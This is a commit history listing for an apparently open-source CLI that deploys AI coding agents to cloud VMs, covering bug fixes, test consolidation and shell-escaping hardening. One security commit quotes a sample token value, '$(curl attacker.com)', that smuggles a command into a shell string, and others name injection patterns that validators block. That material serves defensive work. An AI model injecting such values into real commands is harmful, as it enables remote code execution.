Commit graph

2046 commits

Author SHA1 Message Date
Ahmed Abushagur
06bbbcb2a4
fix: move channel setup to after gateway starts (#2590)
* fix: move Telegram/WhatsApp channel setup to after gateway starts

OpenClaw's `channels add` and `channels login` commands require a running
gateway. Previously, Telegram token configuration ran in setupOpenclawConfig
(pre-gateway) using `openclaw config set`, causing the gateway to hang on
startup when a token was present for a disabled-by-default plugin.

Now:
- Plugin enables stay in setupOpenclawConfig (pre-gateway)
- Channel config (token add, QR login) runs in orchestrate.ts step 11c
  after the gateway is up, using `openclaw channels add/login`

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* security: use shellQuote instead of jsonEscape for Telegram token

jsonEscape uses JSON.stringify which produces double-quoted strings that
the shell interprets, creating a command injection vector. shellQuote
wraps in single quotes, preventing shell interpretation.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* chore: fix biome export ordering in interactive.ts and manifest.ts

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 13:47:50 -07:00
Ahmed Abushagur
39622b68ab
feat: add --beta images for DO marketplace images (#2593)
* feat: add --beta images for DO marketplace images

Gate pre-built DigitalOcean marketplace images behind --beta images.
When active, uses hardcoded marketplace slugs (e.g. openrouter-spawnclaude)
instead of fresh Ubuntu + cloud-init, skipping agent install entirely.

All 8 images verified working via e2e smoke test (2026-03-13).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: sort exports to satisfy biome organizeImports

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-13 15:45:25 -04:00
A
8d3f848907
fix(e2e): increase openclaw gateway resilience timeout to 60s (#2587)
GCP e2-micro VMs are slow and throttled. When the openclaw gateway is
killed during the resilience test, the lock file is held by the dead
process for ~5s. This causes the first systemd restart attempt to fail
with "lock timeout after 5000ms", requiring a second restart cycle.

Timeline on slow VMs: RestartSec(5) + lock-timeout(5) + RestartSec(5)
+ boot(5) ≈ 20s. The previous 30s window was too tight — the gateway
DID recover but just barely missed the polling window on throttled CPUs.

Increasing to 60s gives a comfortable 3x margin for all VM types.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 13:48:02 -04:00
L
84897cfea1
Add note about public anonymous survey (#2588)
Added a note regarding the public anonymous survey and clarified that it is not a security vulnerability.

Signed-off-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 10:47:00 -07:00
A
8f02646b4c
feat: add spawn feedback subcommand (#2585)
* feat: add `spawn feedback` subcommand

Sends anonymous feedback to the Spawn team via PostHog survey API.
Usage: spawn feedback "your message here"

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: update feedback survey ID and response key

Use the correct PostHog survey ID and $survey_response property.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use asyncTryCatch instead of try/catch in feedback command

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-03-13 10:19:37 -07:00
A
d1bbd6cac9
refactor: remove dead parameters from internal functions (#2581)
Remove 5 unused underscore-prefixed parameters that were accepted but
never read: extractFlagValue._flagLabel, performUpdate._remoteVersion,
reportDownloadFailure._primaryUrl/_fallbackUrl, buildRecordLabel._manifest,
and setupCodexConfig._apiKey. All callers updated accordingly.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 09:55:03 -07:00
A
afcc1665b2
test: remove duplicate heredoc test in security.test.ts (#2583)
"should reject heredoc syntax in operator combinations" tested a single
case ("Input << EOF") that is fully covered by the broader "should reject
heredoc syntax" test (3 cases: << EOF, <<- HEREDOC, <<MARKER).

1 test removed, 0 expect() calls lost (the exact input pattern is covered
by the remaining test).

-- qa/dedup-scanner

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 12:50:48 -04:00
A
2dead43404
feat(spa): add private channel support (#2584)
Add groups:history and groups:read OAuth scopes plus message.groups
event subscription so SPA can respond in private channels.

Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-03-13 12:48:54 -04:00
A
130b381a89
test: remove duplicate and theatrical tests (#2580)
Consolidated 11 redundant it() blocks in fuzzy-key-matching.test.ts:
- merged 3 separate distance-1 edit-type tests (deletion/insertion/substitution)
  into one data-driven it() that also covers distance-2
- merged distance-0/1/2/3/4 threshold tests into one parameterized assertion
- merged mirrored resolveAgentKey + resolveCloudKey describe blocks (8 its → 4)

No expect() calls were removed (3644 total preserved); 11 tests consolidated.

-- qa/dedup-scanner

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
2026-03-13 09:31:41 -04:00
A
cb0ed08da0
security: add shell quoting around TERM in cloud module commands (#2579)
Defense-in-depth: wrap sanitized TERM values in single quotes in all
four SSH-based cloud modules (aws, hetzner, digitalocean, gcp). The
allowlist in sanitizeTermValue() already prevents injection, but quoting
the interpolated value adds a second layer of protection.

Also extends test coverage with additional injection vectors (pipes,
redirects, variable expansion, empty strings) and a test verifying the
complete allowlist.

Fixes #2577

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 08:17:46 -04:00
A
566695a256
chore: fix stale AWS default bundle in manifest (medium_3_0 → nano_3_0) (#2578)
The manifest.json aws.defaults.bundle said "medium_3_0" ($20/mo) but
the code in aws/aws.ts defaults to "nano_3_0" ($3.50/mo). This field
is displayed to users during --dry-run preview via buildCloudLines(),
so the mismatch was user-facing. The advertised AWS price of "$3.50/mo"
also confirms nano_3_0 is the intended default.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-13 07:15:34 -04:00
A
520e55bb75
test: fix duplicate test that used wrong input for distance-3 boundary case (#2574)
The "should match at exactly distance 3" test in findClosestMatch was
using "clau" as input (distance 2 from "claude"), which was identical
to the "should match at distance 2" test immediately below it.

Fixed by using "cla" as input, which is genuinely distance 3 from "claude"
(requires inserting u, d, e), correctly testing the threshold boundary.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-13 03:00:45 -07:00
A
f18fb7cfa9
refactor: remove dead code and stale references (#2575)
- Remove stale top-level `discovery.sh` reference from CLAUDE.md file
  structure (the file was never in the repo; actual script lives at
  `.claude/skills/setup-agent-team/discovery.sh`)
- Fix `autonomous-loops.md` rule that referenced `./discovery.sh --loop`
  with the correct path to the actual discovery script

No functional code changes. All 1400 tests pass, biome lint clean.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 05:21:05 -04:00
A
e9f8e49c60
docs: sync README commands table with help.ts source of truth (#2573)
Remove --beta <feature> row from the commands table in README — this flag is
not listed in getHelpUsageSection() in commands/help.ts, which is the source
of truth for the commands table.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 05:19:24 -04:00
A
0541a70d64
chore: fix stale openclaw model default in manifest and hetzner type in discovery rules (#2576)
PR #2567 fixed the openclaw modelDefault in code but missed the manifest
interactive_prompts field. Also update discovery.md Hetzner entry from
the old CX22/€3.29 to the current cx23/€3.49.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 05:18:25 -04:00
A
bbc2f68276
fix: add None option to setup options multiselect, fix arrow key UX (#2572)
Adds a "None" option at the top of the setup options multiselect
prompt, pre-selected by default. This fixes two UX issues:

1. Users can now explicitly skip all setup steps by selecting "None"
   (or pressing Enter with it pre-selected) — previously impossible
   once another option was selected.
2. Arrow keys now respond immediately because multiple items are
   available to navigate from the start.

Strips the __none__ sentinel from the returned step set so no
behavioural change occurs when the user selects "None".

Fixes #2569

Agent: issue-fixer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 01:48:10 -07:00
A
13538cfa98
fix: re-assert gateway auth token after openclaw browser config set calls (#2571)
Each `openclaw config set` does a read-modify-write on the config file,
which can drop fields written by uploadConfigFile — including
gateway.auth.token. This caused the OpenClaw dashboard to return
"Unauthorized" on every fresh deploy.

Fix: after the browser config set and plugin enable blocks, re-set
gateway.auth.token via `openclaw config set` (same non-fatal pattern as
the existing Telegram token call), ensuring the token survives all
read-modify-write cycles.

Fixes #2570

Agent: issue-fixer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 04:17:34 -04:00
A
1c0f0ac280
fix: use machine-specific SSH key name to prevent Lightsail key collisions (#2568)
When multiple machines ran `spawn claude aws`, they all registered their
SSH public key under the hardcoded name "spawn-key". The second machine
would find the key already exists and skip import — but the instance got
provisioned with Machine A's key, causing Permission denied on all SSH
retries for Machine B.

Fix: derive the key pair name from the first 8 hex chars of SHA256 of
the public key content (e.g. `spawn-key-a1b2c3d4`). Different machines
get different key names, eliminating the collision entirely.

Fixes #2565

Agent: issue-fixer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 01:01:56 -07:00
Ahmed Abushagur
6c8c098ba7
fix: enable OpenClaw channel plugins before configuring them (#2564)
Telegram and WhatsApp plugins are disabled by default in OpenClaw.
Setting a bot token without enabling the plugin causes the gateway
to hang on startup. Running `openclaw channels login --channel
whatsapp` without the plugin enabled fails with "Unsupported channel".

Now runs `openclaw plugins enable telegram/whatsapp` before any
channel configuration. Also adds step-by-step instructions for
getting a Telegram bot token from @BotFather.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-13 03:50:22 -04:00
A
2ad7cbe0fc
fix: correct OpenClaw modelDefault from openrouter/openrouter/auto to openrouter/auto (#2567)
The model ID `openrouter/openrouter/auto` had a double `openrouter/` prefix
which failed validateModelId() (requires exactly one slash in provider/model
format). This caused the model to be silently ignored on every OpenClaw
launch, falling back to no model default.

Fix: use the correct `openrouter/auto` model ID in both modelDefault field
and the fallback in setupOpenclawConfig().

Fixes #2566

Agent: issue-fixer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 03:49:12 -04:00
A
6839e34395
fix: remove duplicate --model flag from help and error output (#2562)
The --model flag was listed twice in two user-facing outputs:
- help.ts USAGE section: lines 11 and 20 both showed --model <id>
  with different descriptions
- index.ts unknown-flag error: lines 118 and 121 both showed --model
  with different descriptions

Both duplicates were introduced when --model support was added.
Combined the two entries into one clear line each.

Agent: ux-engineer

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 02:50:36 -04:00
A
370afb631c
security: use shellQuote for Telegram bot token in shell command (#2561)
jsonEscape() produces double-quoted strings ("value") which allow
shell command substitution $(...) inside bash. A malicious
TELEGRAM_BOT_TOKEN like "$(curl attacker.com)" would execute on
the remote VM when openclaw config is set.

shellQuote() uses POSIX single-quote escaping which prevents all
shell expansion. Every other user-supplied value in agent-setup.ts
(GITHUB_TOKEN, git user.name, git user.email) correctly uses
shellQuote — the bot token was the only exception.

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-13 01:51:33 -04:00
A
d578e614e2
refactor: remove dead HeadlessOptions re-export from commands barrel (#2560)
HeadlessOptions is defined and used internally in commands/run.ts but
re-exported from commands/index.ts with no consumer — index.ts imports
cmdRunHeadless but passes options inline without importing the type.
This is a CLI binary, not a library, so unused re-exports add surface
area without value.

Also move the run.ts comment to be adjacent to the run.ts exports.

Bump CLI version to 0.17.4.

-- qa/code-quality

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 22:37:55 -07:00
A
3064c406d3
test: remove duplicate and theatrical tests (#2559)
- Consolidate 4 separate SPAWN_PROMPT/SPAWN_MODE env var tests in
  cmdrun-happy-path.test.ts into 2 tests. Each previously spawned a
  separate bash subprocess to check a single env var; the consolidated
  tests check both vars in one subprocess invocation, halving overhead.

- Remove redundant KNOWN_FLAGS.has() assertions from steps-flag.test.ts.
  The findUnknownFlag() call already exercises the Set membership check —
  the extra .has() assertion was pure duplication. Also removes the now-
  unused KNOWN_FLAGS import.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-13 01:03:06 -04:00
Ahmed Abushagur
515bc16ebd
fix: add hint text and keybinding guidance to setup options prompt (#2557)
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 20:36:15 -07:00
Ahmed Abushagur
8a5908acd2
fix: add step-by-step instructions for getting a Telegram bot token (#2558)
New users don't know how to get a bot token. Show instructions
before the prompt: open @BotFather, send /newbot, copy the token.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-12 23:03:13 -04:00
A
44a6e763cd
fix(zeroclaw): direct binary download from pinned release to fix install timeout (#2554)
ZeroClaw's latest GitHub release (v0.1.9a) ships no binary assets.
The --prefer-prebuilt bootstrap path hits a 404, falls back to Rust
source compilation, and exceeds the 600s install timeout — causing
zeroclaw to fail on all clouds (digitalocean, gcp, hetzner, sprite).

Fix: replace the bootstrap invocation with a direct curl download from
v0.1.7-beta.30 (the last release that ships linux-gnu prebuilt binaries)
into ~/.local/bin. This completes in seconds vs ~20 minutes for a source
build, and removes the swap-space setup step that was only needed for
memory-intensive compilation.

Also remove the now-unused ensureSwapSpace function and update the E2E
verify check to also look in ~/.local/bin for the zeroclaw binary.

-- qa/e2e-tester

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
2026-03-12 18:48:10 -07:00
A
f5def4119f
refactor: remove dead exported types from picker.ts and spawn-config.ts (#2553)
PickOption, PickConfig, and PickResult interfaces in picker.ts were exported
but never imported by any external module. SpawnConfig type in spawn-config.ts
was similarly exported but not used outside the module. Made all four private
to reduce the public API surface.

Bump CLI patch version to 0.17.2.

-- qa/code-quality

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 21:43:05 -04:00
A
ecc876f3bc
fix: remove dead shellQuote re-export from gcp/gcp.ts (#2551)
Dead backwards-compat re-export left over from the shellQuote
consolidation (PRs #2533, #2535, #2546). Zero consumers import
shellQuote from gcp/gcp.ts — all correctly import from shared/ui.ts.
Per CLAUDE.md: avoid backwards-compatibility hacks; delete unused code.

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 21:42:09 -04:00
A
9bb39a213a
test: remove theatrical tests from manifest-integrity (#2552)
Remove 2 tests from the manifest-integrity.test.ts "structure" describe
block that can never fail:

- "should parse as valid JSON": manifest.json is already parsed via
  JSON.parse() at module scope (line 23). If parsing fails, the module
  throws and ALL tests fail — this individual test can never provide
  an independent failure signal.

- "should have agents, clouds, and matrix top-level keys": after parsing,
  Object.keys(manifest.agents/clouds) and Object.entries(manifest.matrix)
  are called at module scope (lines 25-27). If those properties were
  missing, the module load itself would throw. This test is also guaranteed
  to pass whenever any test in the file runs.

Removing these 2 theatrical tests leaves 1403 tests (down from 1405).
All remaining tests provide real signal.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 21:41:03 -04:00
Ahmed Abushagur
f683dd857b
feat: add --config and --steps CLI flags for programmatic setup (#2545)
* feat: add Telegram and WhatsApp options to OpenClaw setup picker

Adds separate "Telegram" and "WhatsApp" checkboxes to the OpenClaw
setup screen:

- Telegram: prompts for bot token from @BotFather, injects into
  OpenClaw config via `openclaw config set`
- WhatsApp: reminds user to scan QR code via the web dashboard
  after launch (no CLI setup possible)

Updates USER.md with channel-specific guidance when either is selected.

Bump CLI version to 0.16.16.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: run WhatsApp QR scan interactively before TUI launch

Instead of punting WhatsApp setup to "after launch", runs
`openclaw channels login --channel whatsapp` as an interactive SSH
session between gateway start and TUI launch. The user scans the
QR code with their phone during provisioning setup.

Flow: gateway starts → tunnel set up → WhatsApp QR scan → TUI launch

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: update WhatsApp hint to reflect pre-TUI QR scanning

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add --config and --steps CLI flags for programmatic setup

Add --config <path> flag to load spawn options from a JSON config file
(model, steps, name, setup data like telegram_bot_token). Add --steps
<list> flag for comma-separated setup step control. Both enable the
web UI and headless automation to control which setup steps run.

Priority order: CLI flags > --config file > env vars > defaults.

- New spawn-config.ts module with valibot validation
- OptionalStep extended with dataEnvVar and interactive metadata
- validateStepNames() for step name validation with warnings
- Telegram setup reads TELEGRAM_BOT_TOKEN env var before prompting
- WhatsApp auto-skipped in headless mode with warning
- promptSetupOptions() skipped when SPAWN_ENABLED_STEPS already set
- E2E verify helpers for github, browser, telegram setup artifacts
- QA reference file documenting all agent setup options
- Version bump to 0.17.0

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* feat: add --model flag and priority order tests

- Add --model <id> CLI flag that sets MODEL_ID env var
- --model is extracted before --config so it takes priority
- Add config-priority.test.ts with 8 tests verifying:
  - --model overrides config model
  - --steps overrides config steps
  - --steps "" disables all steps
  - --name overrides config name
  - Config tokens apply as defaults
  - Explicit env vars override config tokens
- Remove preferences.json from priority order docs (not needed)
- Add --model to help text and unknown-flag guidance

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* docs: add --model, --config, --steps to README

Document config file format, setup steps table, and new CLI flags
in the commands table.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address security review feedback

- Move null byte check before path resolution (defense-in-depth)
- Move agent-setup-options.md from .claude/rules/ to .docs/ (git-ignored)
  per documentation policy

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: resolve rebase conflicts and deduplicate --model flag extraction

Rebase on main introduced a duplicate --model flag extraction block
(one from the PR at line 804, one from main at line 941). Consolidated
into the single early extraction point with -m shorthand support.
Also removed duplicate --model entry from KNOWN_FLAGS set.

Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
2026-03-13 00:32:58 +00:00
A
ff8bff4c02
chore: standardize featured_cloud to digitalocean + sprite for all agents (#2548)
Set every agent's featured_cloud to ["digitalocean", "sprite"] — one
primary recommendation (DigitalOcean) and one fallback (Sprite).

Co-authored-by: Claude <claude@anthropic.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 19:47:08 -04:00
A
6081c0a17f
feat(qa): telegram soak test on digitalocean + fix bun -e (#2547)
- soak.sh: SOAK_CLOUD env var makes cloud configurable (default: sprite)
- qa.sh: load TELEGRAM_BOT_TOKEN, TELEGRAM_TEST_CHAT_ID, SOAK_CLOUD from
  /etc/spawn-qa-auth.env in soak mode
- qa.yml: add weekly Monday 3am UTC scheduled soak trigger
- fix: bun eval → bun -e across soak.sh, key-request.sh, github-auth.sh
  (bun eval is not a valid subcommand in bun 1.3.9)
- fix: export _TOKEN via env prefix so process.env._TOKEN works in bun -e
- docs: update shell-scripts.md rule to say bun -e (not bun eval)

Verified: 3/4 Telegram tests pass in smoke test on DigitalOcean (120s wait)
getMe ✓ sendMessage ✓ getWebhookInfo ✓; cron test needs full 55-min window.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 19:45:18 -04:00
A
2b83a8106d
security: use shellQuote() in agent-setup.ts for consistent null-byte defense (#2546)
Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 19:44:50 -04:00
Ahmed Abushagur
e640d1bfe5
fix: update Codex default model to gpt-5.3-codex and add agent model reference (#2540)
The previous PR (#2536) set the Codex default to gpt-5.1-codex, but the
latest available on OpenRouter is gpt-5.3-codex. Also adds a rules file
documenting each agent's default model to prevent future regressions.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 15:49:19 -07:00
Ahmed Abushagur
d2d71b17ef
feat: add --model flag and preferences file for LLM model override (#2543)
Adds --model / -m CLI flag to override the agent's default LLM model:
  spawn codex gcp --model openai/gpt-5.3-codex

Also supports persistent per-agent model preferences via config file at
~/.config/spawn/preferences.json:
  { "models": { "codex": "openai/gpt-5.3-codex" } }

Priority: --model flag > preferences file > agent default.

This enables a future web UI to pass model selection via CLI args when
invoking spawn programmatically to provision machines.

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 18:47:09 -04:00
A
0d66125fd6
fix: add junie to tarball build pipeline (#2541)
Junie was added as a fully implemented agent (manifest, agent scripts,
agent-setup.ts) but the packer/tarball pipeline was never updated.
This meant the nightly agent-tarballs workflow could not build a
pre-built tarball for Junie, forcing all deployments to do a live
npm install.

- Add junie entry to packer/agents.json (tier: node, @jetbrains/junie-cli)
- Add junie to capture-agent.sh allowlist and path-capture case
  (npm-based, same as codex/kilocode — captures /root/.npm-global/)

Agent: code-health

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 18:45:03 -04:00
A
0963f708b4
test: remove duplicate and theatrical tests (#2539)
Remove redundant existsSync check inside icon-integrity "is actual PNG
data" tests — the file existence is already verified in the preceding
test, and isPng() will throw if the file is missing.

Remove the "should detect multiple dangerous patterns" test from
validatePrompt — it retests the same $(…), backtick, ; rm, and |bash/sh
patterns that each have their own dedicated it() block immediately above.

Fix misleading test description: "should accept scripts with comments
containing dangerous patterns" — the test actually expects a throw
(documented as a known trade-off). Rename to "should reject…".

Removes 1 test (1381 → 1380) and 18 expect() calls.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 16:48:33 -04:00
A
f6f36cc452
security: add DO_CLIENT_SECRET env var override (#2538)
* security: add DO_CLIENT_SECRET env var override

Allows users/organizations to supply their own DigitalOcean OAuth
client secret via DO_CLIENT_SECRET env var rather than relying on
the bundled default. The bundled secret remains as fallback.

Fixes #2537

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* chore: bump CLI version to 0.16.19

Agent: security-auditor
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

---------

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 15:48:36 -04:00
A
91b66f4b40
fix(e2e): fix input test prompt delivery and agent flags (#2536)
Three root-cause bugs in input test functions:

1. Stdin pass-through broken: cloud_exec uses "printf '...' | base64 -d | bash"
   on the remote, meaning bash reads the script from its own stdin — not the
   outer process's stdin. "PROMPT=$(base64 -d)" inside the script was reading
   from the already-consumed pipe, always producing an empty prompt.
   Fix: embed the base64-encoded prompt directly in the remote command string.
   Base64 output is [A-Za-z0-9+/=] only — safe to embed in single-quoted strings.

2. Zeroclaw flag wrong: "zeroclaw agent -p" was passing the prompt as
   --provider (not --prompt). The correct flag for non-interactive single-message
   mode is "-m"/"--message".

3. Codex model stale: "openai/gpt-5-codex" does not exist on OpenRouter.
   Updated to "openai/gpt-5.1-codex" which is available.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 13:50:06 -04:00
A
dfd08ad48c
security: consolidate shellQuote across all clouds (defense-in-depth) (#2535)
PR #2533 hardened GCP with shellQuote() and null-byte rejection, but
left Hetzner, DigitalOcean, AWS, and connect.ts using inline
.replace(/'/g, "'\\''") without null-byte validation.

- Move shellQuote to shared/ui.ts as the single source of truth
- Add null-byte validation to runServer in Hetzner, DO, and AWS
- Replace inline shell escaping with shellQuote in interactiveSession
  across all clouds, connect.ts, and agents.ts buildEnvBlock
- Re-export shellQuote from gcp.ts for backwards compatibility

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 12:54:31 -04:00
A
58a2d3bf18
test: Remove duplicate and theatrical tests (#2534)
Consolidate 9 per-credential-type it() blocks in prompt-file-security.test.ts
into a single data-driven test covering all 17 sensitive path patterns.
Merge 2 validatePromptFileStats "accept" tests into one.

Consolidate 4 unicode/encoding-attack it() blocks in security.test.ts
into a single data-driven test. Merge 3 "accept identifier" it() blocks into one.

Removes 19 redundant tests (1400 → 1381) with no loss of coverage.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 12:52:45 -04:00
A
868ebbe4fe
security: harden shellQuote and consolidate shell escaping in gcp.ts (#2533)
- Add null-byte rejection to shellQuote (defense-in-depth)
- Export shellQuote for testability
- Refactor interactiveSession to use shellQuote instead of inline escaping
- Add comprehensive test suite for shellQuote security properties

Fixes #2529

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 10:27:48 -04:00
A
595e36ffb6
test: Remove duplicate and theatrical tests (#2531)
Consolidate 8 fragmented pipe-to-bash/sh tests in validatePrompt into 2
data-driven tests covering all inputs (with/without whitespace, complex
pipelines, and standalone word acceptance). Merge 3 backtick tests into 1.
Merge 2 whitespace tests into 1. Removes 19 lines of duplicate test setup.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 09:35:21 -04:00
A
6bdef06351
refactor: deduplicate generateCsrfState into shared/oauth.ts (#2530)
The identical generateCsrfState() helper existed in both
digitalocean/digitalocean.ts and shared/oauth.ts. Export it from
oauth.ts (which digitalocean.ts already imports) and remove the
duplicate copy.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Co-authored-by: L <6723574+louisgv@users.noreply.github.com>
2026-03-12 09:33:53 -04:00
A
6fda75ccc8
security: validate base64 output in cloud_exec and soak.sh (defense-in-depth) (#2532)
Add base64 character validation ([A-Za-z0-9+/=]) before use in SSH
command strings for gcp.sh, aws.sh, and hetzner.sh cloud_exec
functions -- matching the existing fix in digitalocean.sh (#2528).

Also add a validated _encode_b64 helper to soak.sh and use it for
all Telegram bot token encoding, preventing corrupted base64 from
breaking out of single-quoted SSH command strings.

Closes #2527

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-03-12 09:32:48 -04:00
A
76399eafd9
security: validate base64 in digitalocean.sh SSH exec (defense-in-depth) (#2528)
Add explicit base64 character validation in _digitalocean_exec after
encoding the command, matching the existing pattern in provision.sh.
This ensures the encoded value contains only [A-Za-z0-9+/=] before
embedding it in the SSH command string.

Note: #2527 (provision.sh base64 validation) was already fixed in a
prior commit — the validation at lines 284-289 already rejects
non-base64 characters and empty output.

Fixes #2526

Agent: security-auditor

Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 08:16:48 -04:00
A
afff57db5b
test: remove conditional-expect anti-patterns from 3 test files (#2525)
Replace `if (!r.ok) { expect(...) }` and `if (result.ok) { return }` guards
with unconditional assertions using toThrow() or toMatchObject(). These
conditional blocks silently skipped assertions when the condition evaluated
the wrong way, providing false confidence. Also remove now-unused tryCatch
imports from prompt-file-security.test.ts and security.test.ts.

Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-12 02:21:20 -07:00
A
